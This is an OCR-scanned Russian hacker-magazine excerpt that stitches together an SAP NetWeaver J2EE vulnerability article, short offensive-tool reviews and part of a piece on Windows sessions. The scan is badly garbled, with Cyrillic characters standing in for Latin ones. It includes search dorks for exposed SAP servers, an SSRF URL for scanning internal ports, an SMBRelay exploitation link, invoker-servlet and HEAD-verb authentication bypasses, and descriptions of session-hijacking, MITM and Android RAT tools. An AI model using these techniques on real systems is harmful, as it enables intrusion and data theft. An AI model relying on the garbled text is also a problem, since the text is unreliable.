не добавляли ко всему прочему боодіе йогкз для поиска этих си- 
стем в интернете. Поступим так же и мы. Поместив в строку поиска 
несложное выражение, например іпигІ:/іг]/рогІаІ (находит десятки 
тысяч систем), іпигІ:/ѵѵ5паѵідаІог/]5р5ЛеБІ.]5р (находит 2430 запи- 
сей) или іпигЫсіЕѵепіБегѵісезар, іпигЫсіЕѵепіБегѵісе/ІсіЕѵепіСопС 
іпигІ:/іг]/до/кт/сіос5/, можно обнаружить БАР-серверы крупнейших 
мировых компаний, доступные через интернет. Ну а теперь перей- 
дем к основным уязвимостям и практике. 

АТАКИ НА ПЛАТФОРМУ И ПРИЛОЖЕНИЯ 

БАР ИеіѴѴеаѵег 12ЕЕ Епдіпе представляет собой сервер приложе- 
ний стандарта Э2ЕЕ, который позволяет размещать приложения, 
написанные на Заѵа. Его можно сравнить со знакомым всем АрасЬе 
Тотсаі, только на несколько порядков больше и сложнее, а там, 
где есть сложность, непременно появляются уязвимости. На дан- 
ном сервере и располагаются сами бизнес-системы (БАР Рогіаі, 
БАР XI, БАР РІ или, например, БоІіЛіопМападег), а также прило- 
жения собственной разработки. Такие крупные системы состоят 
из более мелких приложений (Арріісаііопз), которые по сложности 
зачастую сопоставимы с полноценным веб-проектом. Данных 
приложений по умолчанию устанавливается множество. Напри- 
мер, в версии ЫеМеаѵег 6.40 их около 500, а в версии 7.2 их уже 
1200. На самом деле, помимо веб-сервиса с уймой 
приложений, движок слушает множество портов 
различными службами. Там тоже очень много инте- 
ресного, но это тема для отдельной статьи. 

Масштабы впечатляют, а если учитывать, 
что каждое приложение имеет, помимо общих, так- 
же и свои настройки безопасности и уязвимости, 
то адекватная защита всей платформы, не считая 
вариант отключения от сети, представляет собой 
крайне непростую задачу. Рассмотрим основные 
типы уязвимостей, которые были обнаружены на- 
шим исследовательским центром. 

РАЗГЛАШЕНИЕ ИНФОРМАЦИИ 

Средняя критичность. Зачастую не позволяет ата- 
ковать компанию напрямую, но помогает для даль- 
нейших атак. Были обнаружены следующие 
уязвимости: 



Бегѵісе Мате 


Рог* МитЬег 


ОеіаиІ* Ѵаіие 


Кап§е (тіп-тах) 


НТТР 


5МЖХ) 


БОООО 


50000-59900 


НТТР оѵег 551 


5М01 


50001 


50001-59901 


ПОР 


5^07 


50007 


50007-59907 


НОР ІпіііаІ Сопіехі 


5МЧ02 


50002 


50002-59902 


ПОР оѵег 551. 


5ЫІЧОЗ 


50003 


50003-59903 


Р4 


5М04 


50004 


50004-59904 


Р4 оѵег НТТР 


5^05 


50005 


50005-59905 


Р4 оѵег 551 


5М06 


50006 


50006-59906 


Теіпеі 


5 NN08 


50008 


50008-59908 


ІовѴіеѵѵег сопігоі 


5NN09 


50009 


50009-59909 


ІМ5 


$NN10 


50010 


50010-59910 



Названия служб 5АР и соответствующие им номера портов 
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БОЛЬШОЙ ПЕРЕПОЛОХ 



Наше исследование платформы БАР МеіѴѴеаѵег .Л2ЕЕ Епдіпе вызвало 
большую шумиху в мировой прессе (в таких международных изданиях, 
как КеШегз, СЮ, РСѴѴОВЮ и прочих), а также было представлено на 
международной конференции ВІаск На* в Лас-Вегасе. 



• получение версии и патча движка и приложения (можноузнать, 
какиеуязвимости присутствуют). К примеру, если обратиться 
поссылке/гер/Ьш1сНп*о.]зрили/ЬсЬ/ЬсЬас)т5у5*ет1п*о.]5р, 
можно получить информацию о релизе, которую можно потом ис- 
пользоватьдля проведения дальнейших атак; 

• неавторизованное чтение некоторых файлов журналирования 
(в нихчастохранятся пароли и прочие важные данные); 

• неавторизованное разглашение имен пользователей (можно под- 
бирать пароли); 

• неавторизованноесканированиевнутренниххостовсети (возмо- 
жен даже перебор паролей на внутренние серверы и блокировка 
учетныхзаписей). 

Наверное, самый интересный пример — это последний. В одном 
из веб-сервисов была обнаружена интересная деталь. В качестве 
входных данных можно передать ІР-адрес и порт сервера для про- 
смотра неких данных. Нам же гораздо интереснее с помощью 
данной уязвимости просканировать внутреннюю сеть компании 
на предмет открытых портов и запущенных сервисов. Скрипт вы- 
зывается следующим образом. В качестве зегѵег и рог* указываем 
произвольные данные для сканирования и по ответу сервера 
узнаем, открыт порт или нет. 

Ы:1:р://5ар5егѵег/ірсргісіп§/иі/Ви-р-Рег0ѵегѵіе(л/.]5Р?*-' 

зегѵег=172 .16.0. 13&рогС=31337&ра55могсІ= 
&(Изра*:сНег=&1:аг§е*С1іеп1:=&ѵіем= 

МЕЖСАЙТОВЫЙ СКРИПТИНГ 

Средняя критичность. Одна из самых популярных уязвимостей, все 
с ней знакомы, и в детали вдаваться нет смысла. Добавлю лишь 
только, что по умолчанию сессия не привязана к ІР-адресу, то есть, 
перехватив соокіе, можно без проблем аутентифицироваться 
в портале. Зачастую достаточно разместить ссылку на Х55 как до- 
кумент в системе БАР Рог*аІ; это повысит шансы того, что по ней 
пойдут. На данный момент выпущено около 30 исправлений, 
закрывающих около 50 уязвимостей данного типа, обнаруженных 
нами, над остальными ведется работа. 

5МВВЕІ.АѴ 

Высокая критичность. Фактически это уязвимость ѴѴіпсіоѵѵз-сетей, ко- 
торая так и не закрыта для некоторых атак. Для ее эксплуатации тре- 
буется, чтобы БАР-сервер стоял на М/іпсІоѵѵз-кластере или чтобы два 



ДОСТАТОЧНО РАЗМЕСТИТЬ 
ССЫЛКУ НА НАЙДЕННУЮ Х55 
КАК ДОКУМЕНТ В СИСТЕМЕ 
5АР РОКТАЦ И С БОЛЬШОЙ 
ВЕРОЯТНОСТЬЮ ПО НЕЙ ПОЙДУТ 




Экспериментируем с входными данными 

сервера БАР работали из-под одной доменной учетной записи. Поми- 
мо этого, уязвимое веб-приложение на БАР должно иметь интерфейс 
обращения к файлам. Для эксплуатации уязвимости злоумышленник 
поднимает поддельный БМВ-сервер и передает веб-приложению БАР 
ссылку на файл, находящийся на удаленном БМВ-сервере. Процесс 
сервера БАР пытается запросить файл с правами своей учетной запи- 
си, мы перехватываем ее на поддельном БМВ-сервере и заходим от ее 
имени обратно на сервер, получая тем самым права администратора 
на ОС (описание процесса несколько упрощено, но основная его 
суть такова). Аналогичную уязвимость можно использовать в связке 
с С5РР — в случае если данный интерфейс требует аутентификации, 
необходимо заставить администратора нажать по ссылке так же, 
как для ХББ-уязвимости. К примеру, уязвимость можно проэксплуа- 
тировать, обратившись по следующей ссылке: Ь**р://зегѵег:рог*/ттг/ 
ММР?*іІепате=\\5тЬ5піНег\апуЛІе. 

ОБХОД АВТОРИЗАЦИИ ЧЕРЕЗ ІМѴОКЕР 5ЕРѴІ.ЕТ 

Высокая критичность. Всем известно, что намного круче обна- 
ружить целый класс (ну или хотя бы подкласс) уязвимостей, чем 
отдельную проблему, так как, обнаружив новый класс, можно будет 
найти массу примеров. Вообще говоря, большинство уязвимостей 
обнаруживается на грани программистской и администраторской 
ответственности, когда каждая сторона считает, что это не ее об- 
ласть. Тем не менее злоумышленнику, как правило, без разницы, 
чья это область, и он не откажется воспользоваться обнаруженной 
уязвимостью, пока ответственные будут выяснять свои отношения. 
В данном случае для настройки безопасности веб-сервисов ис- 
пользуется файл ѵѵеЬ.хтІ, который программисты зачастую игнори- 
руют или используют минимально, полагаясь на то, что это задача 
администраторов. Администраторы же, в свою очередь, нередко 
вообще понятия не имеют, что есть такой файл и что его настройка 
влияет на безопасность. Но сначала взглянем на структуру типич- 
ного файлика ѵѵеЬ.хтІ: 

<зегѵ1е*> 

<5егѵ1е*-пате>Сгі*іса1Ас*іоп</5егѵ1е-С-пате> 
<5егѵ1е*-с1а55>сот. Бар.асІтіп.Сгі-СісаІ.АсІііоп^ 
</зегѵ1е*-с1а55> 

</зегѵ1е1:> 

<зегѵ 1 е 1 :-тарріп 2 > 

<5егѵ1е*-пате>Сгі1:іса1</</5егѵ1е1:-пате> 

<иг1-ра1:1:егп>/ас1т1п/сгШса1-Рипс</иг1-ра1:1:егп> 

</зегѵ1е'*:-тарріп§> 

< вес и гі1:у - соп з* га і п* > 

<ѵѵеЬ-гезоигсе-со11ес1:іоп> 

<ѵѵеЬ-гезоигсе-пате>Рез{гіс*:есІассе55</иеЬ-ге5оигсе-пате> 

<иг1-ра!*егп>/асІтіп/*</иг1-ра'1:1:егп> 

< Ы * р - те* НосІ ><5 Е Т < / И** р - те* ЬосІ > 

</іл/еЬ-гезоигсе-со11ес*іоп> 
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БАР: под шквалом разящих стрел 



<аиТН-соп5ТгаіпТ> 

<го1е-пате>асІтіп</го1е-пате> 

< / а иТ Ь - соп 5Т га і пТ > 

</5есигі-1:у-соп5І:гаіпТ> 

А в результате получается множество уязвимостей, подобных 
следующей. В движке ^ЕЕ есть такой механизм, как Іпѵокег 
Бегѵіеі. Он позволяет вызвать любой сервлет (часть приложе- 
ния, выполняющая функционал на сервере), напрямую набрав 
в строке ІІВІ_ имя класса для данного сервлета таким образом: 
<аррІісаІіоппате>/5егѵІеі/<$егѵІеІ-пате-ог-сІа55>. Проблема 
начинается в тот момент, когда вы размещаете ссылку на серв- 
лет в какой-либо директории типа /асітіп (в данном примере 
к сервлету можно обратиться по ссылке /асітіп/сгііісаііипс) 
и закрываете к ней доступ для всех, кроме администратора. 

В данном случае злоумышленник может обратиться напрямую 
к сервлету через Іпѵокег-механизм по ссылке /зегѵіеі/сот.зар. 
асітіп. СгіІісаІ.АсІіоп и получить необходимые данные без ау- 
тентификации, так как прямой доступ к директории /зегѵіеі 
не заблокирован по умолчанию. Мы обнаружили немало таких 
приложений, которые позволяют выполнять различные действия 
в обход авторизации, хотя для защиты всего лишь требуется 
поставить ограничение на доступ к корневой директории или 
к директории /зегѵіеі. 

Основная проблема для нас заключалась в том, что надо было 
найти среди всех 500 приложений те, что не фильтровали до- 
ступ к ІпѵокегБегѵІеІ и выполняли через этот сервлет опасные 
действия, — ведь нужно же показать реальный риск, а не просто 
ткнуть пальцем в кривую архитектуру со словами: «это теоретиче- 
ски, в особых ситуациях, при условии а + Ь - с * сі может привести 
к чему-то не очень хорошему». 

Один забавный веб-сервис, к примеру, позволяет читать про- 
извольный файл с ОС, и он уязвим к данной баге, а значит, можно 
читать файлы, хранящиеся на сервере. При желании можно даже 
выкачать напрямую данные из СУБД и покопаться в финансо- 
вых транзакциях... (главное, чтобы не завис браузер от открытия 
и скачки файлов по несколько гигабайт). 

ОБХОД АУТЕНТИФИКАЦИИ ЧЕРЕЗ 
ПОДДЕЛКУ НТТР-ЗАПРОСОВ 

Нам было мало этой уязвимости, да и не комильфо как-то 
без шелла на ВІаск Наі ехать. В итоге я нашел баг, который позво- 
ляет независимо от версии БАР и версии ОС, на которой работает 
БАР, получить права администратора в системе удаленно (причем 
для ее эксплуатации не требуется ничего, кроме стандартных 
средств ОС и минимальных знаний протокола НТТР), и, что самое 
главное, большинство систем в интернете действительно к ней 
уязвимо. 



<$егѵІе^ате>СгііісаІАс*іоп</5егѵІе*-пате> 

<$егѵІеЬсІа$$>сот.5ар.агітіп.СгііісаІ.Ас»іоп</5егѵІеі-сІа$5> 

</5вгѵІеі> 

<5егѵІеі-тарріп8> 

<$егѵІе»-пате>СгйісаІАЛк)п</</$егѵІеі-пате> 

<игІ-раПвгп>/аЛпіп/сгЛ»сак/игІ-раПегп> 

сДегѵІеІ-тарріпв 

<$есіігі*у-соп$ігаіпі> 

<ѵѵеЬ-ге5оигсе-соІ1есІіоп> 

<уѵеЬ-ге$оигсе-пате>Яе$Ігіс*еаассе55</ѵѵеЬ-ге5оигсе-пате> 

<игІ-раПвгп>/аатіп/*</игІ-ра«егп> 

«Ьпр-теіЬоі^ОЕТс/Ьпр-теіЬосІ» 

</ѵѵеЬ-ге5оигсе-соІІесііоп> 



</аіДЬ-соп5Ігаіт> 

</$есигііу-соп$иаіт> 



<аи*Н-соп5ігаіп*> 

<гоІе-пате>агітігк/гоІе-пате> 




Обход авторизации через Іпѵокег Зегѵіеі 




ЕРРЗсап — наш сканер безопасности ЗАР 



Уязвимость обнаружена все в том же ѵѵеЬ.хтІ, и потенциально 
к ней уязвимо около 40 приложений. На данный момент нами об- 
наружено три реально уязвимых приложения. Проблема заклю- 
чается в том, что механизм ѵѵеЬ.хтІ позволяет ограничить доступ 
к ресурсу, позволив определенной роли пользователей выполнять 
определенные НТТР-методы. 

<5есигіТу-сопзТгаіп1:> 

<и/еЬ-гезоигсе-со11ес1:іоп> 

<меЬ-гезоигсе-пате>Рез1:гіс'1:есІассе55</меЬ-ге5оигсепате> 

<иг1-раТТегп>/асітіп/*</иг1-ра1:1:егп> 

< ЬТТ р - теТ ЬосІ >й Е Ь Е Т Е < / ІгЫ: р - теТ ЬосІ > 
</ѵѵеЬ-гезоигсе-со11есТіоп> 

<аиТЬ-соп5І:гаіп1:> 

<го1е-пате>асітіп</го1е-пате> 

</аиТЬ-сопзТгаіпТ> 

с/зесигіТу-сопзТгаіп-О 

В нашем примере в папку /асітіп может заходить только пользо- 
ватель с ролью асітіп и выполнять метод БЕТ. Как оказалось, все, 
что явно не запрещено, то разрешено, то есть, например, обраще- 
ние методом НЕАБ, который делает ровно то же самое, что и БЕТ, 
только не показывает результат пользователю, может быть реали- 
зовано анонимно без наличия и пользователя, и роли. То есть, если 
бы название метода не было указано явно, это бы значило, что все- 
ми методами можно ходить только админу, и все бы было ОК. А раз 
указал один метод, то уж изволь все остальные перечислить. 

Таким образом, задача заключается в том, чтобы найти все 
критичные приложения, которые: 

• поддерживают НЕАО-запрос и обрабатываютего также, как БЕТ; 

• выполняюткритичноедействие, причем нам неважнотело от- 
вета, поскольку это НЕАО; 

• желательно присутствуют во всех инсталляциях, а не просто 
какдемопример. 

Одно из найденных нами приложений, которое является 
системным, позволяет создавать в системе пользователя и на- 
значать ему любую роль. Также в файле ѵѵеЬ.хтІ, помимо данной 
уязвимости, есть множество других параметров безопасности, 
таких как использование шифрования. 

В заключение можно сказать, что это далеко не весь набор 
проблем ^ЕЕ-движка, о ряде других я, возможно, расскажу 
в ближайших номерах, ну а остальные проблемы пока еще не за- 
крыты производителем. Вот и все на сегодня. А тех, кто интере- 
суется темой безопасности БАР или других бизнес-приложений, 
а также любой другой работой, связанной с безопасностью, 
милости просим в нашу команду. У нас много открытых вакансий, 
и даже если вы не нашли их на сайте, то не стесняйтесь писать 
напрямую, з: 
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ЛОВИМ ПЕЧЕНЬКИ 

Сегодня еще достаточно большое количество 
сайтов передают персональную и конфи- 
денциальную информацию по НИР без $51_/ 
И5. Много шума недавно наделала тулза 
РігеэЬеер, выполненная в качестве плаги- 
на для Ріге^ох. Соокіе Сасідег — это кросс- 
платформенная утилита на Заѵа, сочетающая 
в себе мощь ѴѴігезЬагк и простой графический 
интерфейс. В рабочем окне программа показы- 
вает, какие сессии открыты на ноутбуке жерт- 
вы. Можно выбрать любую сессию — и в один 
щелчок мыши воспроизвести ее в своем бра- 
узере, путем воспроизведения таких же НИР 
6ЕТ запросов с перехваченными соокіез. Про- 
грамма полностью захватывает НИР-запрос 
как в ѴѴі-Рі, так и в проводных сетях. Также 
программа умеет анализировать записанные 
ранее рсар-файлы. Алгоритм работы прост: 

1. ловим запрос; 

2. повторяем запрос; 

3. получаем чужие данные. 



Для успешного перехвата сессии необходи- 
мо сначала идентифицировать наличие сессии. 
Для этого можно написать специальный плагин 
для Соокіе Сасідег, на сегодняшний день он уже 
поддерживает: РасеЬоок, Тѵѵіііег, ВегісІіІ, 

ОгираІ, рЬрВВЗ, ѴѴоггіРгезз. Так что написать 
плагин для ѴК, Ыпкесііп и так далее не составит 
труда. 




ШВЕЙЦАРСКИЙ НОЖ 
ДЛЯ ЭКСПЛОЙТОПИСАТЕЛЯ 



Если ты время от времени пишешь эксплойты 
под платформу \Л/іпсіоѵѵ5, то ты точно знаешь 
о Мопа.ру, а если нет, то мы исправим эту чудо- 
вищную ошибку. 

Мопа.ру — это плагин для отладчика 
Іттипііу йеЬиддег и с версии 2.0 для МпйЬд. 
Весь функционал практически идентичен, 
но есть и различия. После того как ты приатта- 
чился к процессу программы, для которой пи- 
шешь эксплойт, РуСоттапсіз Ітопа вступает 
в дело и автоматизирует огромное количество 
шагов, которые необходимо пройти при напи- 
сании эксплойта. 

Возможности инструмента: 

• создание еддЬипІег-кода; 

• поиск гаджетов для _ІОР/ВОР-эксплойтов; 

• поиск гаджетов для обхода 5а(е5ЕН; 

• автоматическое создание скелета эксплой- 
та для Меіазріоіі. 



Помимо этого, он умеет переводить ин- 
струкции в опкоды, автоматически устанав- 
ливать брейкпоинты на наиболее интересные 
функции в процессе написания эксплой- 
та, помогать находить «плохие» символы 
в шелл-коде, производить трассировку САІ_І_- 
инструкций, сравнивать два бинарных участка 
в памяти, отображать ІАТ/ЕАТ для определен- 
ных модулей и много еще чего. 




5МОРТ НЕ В КУРСЕ 

Существует активное и пассивное сканиро- 
вание сети. При пассивном сканировании 
атакующий остается незаметным, но при этом 
страдает точность, у активного сканирова- 
ния ситуация противоположна. Но появилось 
одно решение — компания Іпщиа выпустила 
ТСР-сканер Іорега, который сканирует порты 
по протоколу ІРѵб и не детектируется системой 
БІМОРТ. 5ІЧ0РТ — популярная ореп зоигсе 
система предотвращения и обнаружения 
вторжений (Ю5/ІР5), которая используется 
на многих серверах. Она способна выполнять 
регистрацию пакетов и в реальном времени 
осуществлять анализ трафика в ІР-сетях. 
Система 5М0РТ эффективно детектирует 
попытки сканирования портов обычными 
сканерами. Она выполняет протоколирование, 
анализ, поиск по содержимому, широко ис- 
пользуется для активного блокирования или 
пассивного обнаружения целого ряда нападе- 
ний и зондирований, таких как переполнение 
буфера, сканирование портов и прочие. БіѵІОРТ 
используется во многих критических окруже- 
ниях, где важно вовремя обнаружить попытки 
вторжения. Она также является частью не- 
скольких известных коммерческих систем, 
таких как .Іипірег и СЬескроіпІ. Новый сканер 
Іорега был представлен 1 декабря на хакер- 
ской конференции Маѵа]а Ыедга. Что, как и по- 
чему— добро пожаловать в исходники. 
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7 утилит для исследования безопасности 



ВНУТРИ ПРОШИВКИ 

Віпѵѵаік в первую очередь предназначен 
для идентификации файлов и кода, встроенных 
внутрь прошивки. Данный инструмент исполь- 
зует библиотеку ІіЬтадіс, так что полностью 
совместим с тадіс-сигнатурами, созданными 
для ШХ-утилиты б!е. Кроме этого, Ьіпѵѵаік 
содержит и собственные сигнатуры файлов, ко- 
торые в большей степени заточены для образов 
прошивок, таких как: 

• сжатые/заархивированные файлы; 

• заголовки прошивок; 

• ядраЫпих; 

• загрузчики; 

• файловые системы и так далее. 

Также еще можно писать собственные 
сигнатуры для файлов. При этом для рабо- 
ты программы на вход достаточно подать 
лишь путь до исследуемого бинарного файла 



и при необходимости выставить нужные флаги, 
которые в большей степени отвечают за то, 
что необходимо искать внутри и что при этом 
использовать или не использовать. Это очень 
полезно, когда вы только сливаете прошивку 
с устройства и не знаете, из чего она состоит 



и что у нее вообще внутри. А так чаще всего 
и бывает — разработчики не хотят давать 
возможность изучать, на чем работает их 
железяка. А с ростом популярности Ьагсіѵѵаге 
баскіпд этот инструмент становится еще более 
привлекательным. 



аде іі/е: 378293? Ьути, Оа(а 
8иШ*Ше Іваде, соиргегііоп 
276672 0.438СО 

1822884 Ѳх 173954 

іпойе*, Ыоскіііе: 65536 ЬуТс 
1522123 «ХІ739С8 




Автор: Сгаід 
НеНпег 

ЦКЬ: сосіе. 

дордіе.с от /р/ 

Ьіпѵѵаік/ 

Система: Ыпих 




Авторы: АІЬегІоОг- 
падЫ, МагсоѴаІІегі, 
Етіііо ЕзсоЬаг, Егіс 
Мііат 

ЦКи еЦегсар.дііЬиЬ. 

сот/еПегс ар 

Система: ѴѴіпсІоѵѵз/ 
Ыпих/Мас/В50 






Автор: РоЬіп йаѵісі 

ОШ: Н»р5://дііЬиЬ. 

соді/КоЬшРауиі/ 

апгігогаі 

Система: Апсігоісі 




КЛАССИКА МІТМ-АТАКИ 

Еиегсар — это классика. Еиегсар — это полно- 
ценный набор для проведения атаки «человек 
посередине» (МІТМ). Еиегсар представ- 
/ этсобой сниффер, перехватчик пакетов 
и регистратор для локальных ЕіЬегпеІ-сетей. 
Поддерживаетактивный и пассивныйанализ 
множества протоколов (втом числе шиф- 
рованных, напримерББН и НТТР5). Также 
возможно инжектирование собственных 
данных в имеющееся соединение и фильтра- 
ция на летубез нарушения синхронизации 
соединения. Для создания мощного и полно- 
функциональногосниффера было реализова- 
но множество режимов прослушивания сетей. 
Возможности: 

• построение карты сети; 

• ипібесівпіиіпд; 

• Ьгісідесізпіиіпд; 

• АВР роізопіпд атака; 

• перенаправление ІСМР; 

• спуфингРНСР; 

• кража портов; 

• модификация пакетов; 

• 55Н1МІТМ; 

• фильтрация пакетов; 

• пассивноесканированиесети; 

• пассивныйфингерпринтОС; 

• определение открытых портов. 

Поддерживаются плагины. 



ЦОМ І.ЕѴЕІ. 1/2/3 ПОД ПРИЦЕЛОМ 

Искать сегодня баги в веб-браузерах очень 
выгодно, знает каждый. А появление ново- 
го фаззера всегда интересно. Конечно, их 
частенько релизят, когда ими уже прошлись 
по всем популярным браузерам и практи- 
чески исчерпали их функционал, но никто 
не мешает взять и улучшить его, модифи- 
цировать или просто позаимствовать идею 
для собственного фаззера. Аналогичная 
ситуация была с Сгозз^игг от МісЬаІ 2аІеѵѵзкі. 
Но автор признался, что даже не запускал его 
(?!) на Ріге^ох, Орега, 5а!агі и всех мобильных 
браузерах :). 

Итак, на конференции ОеерБес 2012 был 
представлен фаззер №ща, который предна- 
значен для фаззинга РОМ ІеѵеІ 1/2/3. В общем 
данный фаззер нацелен на изе-аДеМгее 
и сіоиЫе (геев баги, которые чрезвычайно рас- 
пространены в мире веб-браузеров, тем более 
когда речь касается компонетов с древовид- 
ной структурой, как у РОМ-интерфейса. 
написан на ЭаѵаБсгірІ и заточен под Сгіпсіег — 
фреймворк для сбора/классификации/воспро- 
изведения падений, что очень удобно. 

С помощью данного фаззера были найдены 
такие баги, как СѴЕ-2012-2546, СѴЕ-2012-4781, 
СѴЕ-2012-4782. Чтобы подробнее ознакомиться 
с фаззингом РОМ-объектов, советую обра- 
титься к презентации «Такіпд Вгоѵѵвегз Риггіпд 
То ТЬе Иехі (РОМ) ІеѵеІ». 



ВАТ ДЛЯ АШВОЮ 

Удаленно следить за своим (или не своим) 
АпсІгоісІ-устройством и управлять им — вещь 
нужная и полезная. И немудрено, что в по- 
следнее время активно разрабатываются ВАТ 
(Ветоіе Асітіпізігаііоп ТооІ) для мобильных 
устройств. Инструмент апгігогаі представляет 
собой клиент-серверное приложение на Эаѵа/ 
Бѵѵіпд для удаленного управления устрой- 
ством и получения с него нужной информа- 
ции. Клиентская часть работает как сервис 
(а не асбѵііу), который запускается во время 
загрузки. Для подключения приложения к сер- 
веру можно отправить специальную 5М5 или 
сделать специальный вызов. После подключе- 
ния к приложению можно получить доступ: 

• к телефонной книге; 

• истории звонков; 

• всем сообщениям; 

• текущему местоположению; 

• картинке с камеры; 

• звуковому потоку с микрофона. 

Конечно, можно просматривать информа- 
цию о самом устройстве, такую как телефон- 
ный номер, ІМЕІ, страну, оператора, наличие 
\А/і-Рі-сети, состояние батарейки и так далее. 
Также можно совершать некоторые действия: 

• отправлять сообщения; 

• делать звонки; 

• открывать УВІ_ в браузере. 
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Сессия 





44м редаеди*. ни автор не 
несут ответственности 

за любой возможный 

вред, причиненныіГмате- 

риалами данной <?#атъи. 



ПОТОК СОЗНАНИЯ 
АЛА ЭКА ПРО ТАЙНЫ СЕССИЙ 
И СЕРВИСОВ ѴѴІН00ѴѴ5 



Что мы знаем про сессии и сервисы в ѴѴіп- 
сіоѵѵб? Да практически ничего, кроме того, 
что они существуют. Что это за сущности, 
с чем их едят заматерелые хакеры? Как можно 
оценить сессию с точки зрения обеспечения 
защищенности и безопасности в ѴѴіпсіоѵѵб? 
Сегодня мы об этом и поговорим, попытаемся, 
так сказать, пролить свет на эту загадку. 



ЧТО ИМЕЕМ? 



Как я неоднократно говорил, отсутствие в свободном доступе до- 
статочного/исчерпывающего количества информации относитель- 
но какой-либо технологии ѴѴіпсІоѵѵз — однозначный признак того, 
что архитекторы и разработчики системы хотят сохранить в тайне 
ее детали, поскольку их раскрытие может скомпрометировать 
всю систему безопасности. Так, например, обстоят дела с РРС или 
Раісббиагсі. 

Аналогичная ситуация складывается с сессиями в ѴѴіпсІоѵѵз. 
Многие айтишники что-то там про них слышали, значительно мень- 
шей части компьютерного народа знакомы слова «БезБІоп О». 



Понятие сессии на самом деле не так сложно. Можно говорить 
о ней как о некоем временном промежутке работы совокупности 
программ для одного пользователя. Но при этом сессии являют- 
ся важной частью обеспечения безопасности системы и защиты 
пользовательских данных. Это словно оболочка, связывающая все 
действия пользователя, запущенные программы и сам десктоп. 

Рассмотрим все это поподробнее. 



ЧТО ТАКОЕ СЕССИЯ? 



ѴѴіпсІоѵѵз изначально проектировалась как многопользовательская 
система. И это было сделано путем реализации так называемых 
терминальных сессий. Здесь надо помнить, что «терминальная сес- 
сия» и «сессия с момента захода в систему через ѵѵіпіодоп.ехе» — 
немного разные вещи. Терминальные сессии создаются и управ- 
ляются сессионным менеджером зтзз.ехе — процессом, который 
стартует в системе одним из первых. ѴѴіпІодоп-сессии и процессы 
как бы «живут внутри» терминальной сессии. 

Для того чтобы получить Ю-номер терминальной сессии, 
можно использовать функцию 1_5а6еІІ_одоп5е55Іоп0аІа с после- 
дующим перечислением ѴѴіпІодоп-сессии посредством функции 
1_5аЕпитегаІеІ_одопБе55Іоп5. Также можно получить Ю сессии 
путем вызова беГГокепЫогтаІіоп с параметром ТокепБеззіопІсІ, 
после получения первичного токена процесса (функция 
ОрепРгосеззТокеп). 
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Сессия для злокодера 



'V, Ітегасііѵв іегѵке; Ь аіод гіеіесьоп вУві 

А ргодгат сапі гіізріау а те55аде оп уоиг сіезкіор 

ТНе ргодгат тау пеесі іггіогтаііоп ог регтідеіоп (о сстріле а (а$к. 

&ІЬх..<1а.«.Й№ Ь$РР*П? 

“► БНоѵѵ те іНе теззаде 
* Кетіпгі те іп а *еѵѵ тігиДез 

л ІНкк ргоогат <йий »І 

I Ргодгат(5) ог <1еѵісез(5) гедііеЯіпд аПепіюп. 

Меззаде Ме: \Л/іп<іоѵѵз Іпіегпеі Ежріогег 
Ргодгат ра*Ь: С:\\Л/іп<Іоѵѵ5\зуз1ет32\ІЕРКАМЕ.<«І 
і Рвсеіѵегі: Тосіау, ЗерІетЬегОЗ, 2010, 5 тітЛез адо 

' ТЬіз ргоЫет Ьаррепз Ьесаизе о і раніаі тсотраІіЬіІку ѵй*Н ѴѴтсіоѵѵз. 

РІеазе сопіас* іЬе ргодгат ог деѵісе тапцРас1игвг<5) Іог тоге іпІогтаТіоп. 



«Пусть говорят!» 

У сессии есть ряд своих приватных структур, которые исполь- 
зуются для управления памятью. У сессии есть свое адресное 
пространство, которое содержит копии данных, модифицирован- 
ных драйвером графической подсистемы ѴѴіп32к.5уз, саму копию 
Мп32к.5уз, а также немодифицированные данные и различные 
драйверы, загруженные сессией. У сессии есть пространство вью- 
шек— виды десктопа. 

И разумеется, у сессии есть свой пул памяти. Между сессиями 
всех пользователей можно взаимодействовать на программном 
уровне. Это делается посредством пайпов, сокетов и глобальных 
эвентов. А вот посылать месседжи в другую сессию не выйдет. 

Примечателен и любопытен с точки зрения системной без- 
опасности тот факт, что до появления ѴѴіпсіоѵѵз Ѵізіа системные 
сервисы, жіпіодоп.ехе и клиент-серверная подсистема сзгзз.ехе 
(о которой я уже не раз писал) стартовали как часть «нулевой 
сессии» (Беззіоп 0) вместе с первым залогинившимся клиентом, 
а все последующие залогинившиеся пользователи нумеровались 
как Беззіоп 1, Беззіоп 2 и так далее. Кстати, сколько у нас там сей- 
час в интернете остается пользователей ХР? ;) 

А теперь самое интересное — эта ситуация стала напоминать 
забавный принцип «кто первый встал, того и тапки»: первый же 



залогинившийся в систему юзер получал привилегии Беззіоп О, 
то есть мог запросто получить системные права, ведь важнейшие 
системные сервисы оказывались по соседству с простыми поль- 
зовательскими приложениями, такими правами не наделенными. 
Чем это грозило? Например, злобными збаиег-атаками, когда 
окну посылается сообщение (да-да, с использованием функции 
БепсіМеззаде) с ядерной начинкой внутри в виде шелл-кода, повы- 
шающего привилегии. Можно было получить доступ к расшарен- 
ным секциям системных процессов, если те неправильно защище- 
ны. Можно было скомпрометировать объекты \ВазеМатебОЬ]ес1з 
(кто не знает — в Гугл). Одним словом, способов в очередной раз 
поиздеваться над системой было предостаточно. 

Однако с выпуском ѴѴіпбоѵѵз Ѵізіа эту лавочку прикрыли. Беззіоп 
О была надежно изолирована от пользовательских приложений. 

Так думали в МісгозоЙ :). 

По-другому думал неугомонный румын («цыган», хотел на- 
писать) Алекс Ионеску, которого очень хорошо знают все, кто хоть 
как-то связан с системным программированием и разработкой 
ОС по типу ѴѴіпсіоѵѵз. Действительно талантливый чувак, один 
из разработчиков ВеасЮБ, если мне не изменяет память. Пытли- 
вый Ионеску нарыл способ приаттачиться в Беззіоп 0. Способ хоть 
и весьма условный, однако работающий. В ѴѴіпсіоѵѵз 7 эта проблема 
была окончательно устранена. 



ИНТЕРАКТИВНЫЕ СЕРВИСЫ —■■■■И 
КАЗНЬ ЕГИПЕТСКАЯ НА ГОЛОВУ МІСР050РТ 



ѴѴіпсіоѵѵз для прикладных и системных тру-кодеров предоставляет 
возможность создания сервисов — программ, которые крутятся 
на заднем фоне, особо не мешают пользователям и что-то там по- 
тихоньку считают. Кто не в теме — в качестве некоего аналога могу 
привести демоны в *піх-Ііке операционных системах. Ничего слож- 
ного в создании ѴѴіп-сервисов нет, документации полно, примеров 
еще больше, и ими активно пользуются как честные программи- 
сты, так и малварщики. 

Есть такая возможность создания интерактивного сервиса — 
с флагом 5ЕВѴІСЕ_ІМТЕВАСТІѴЕ_РВ0СЕ55 при вызове функций 
СгеаІеБегѵісеП или СЬапдеБегѵісеСопіідП. 

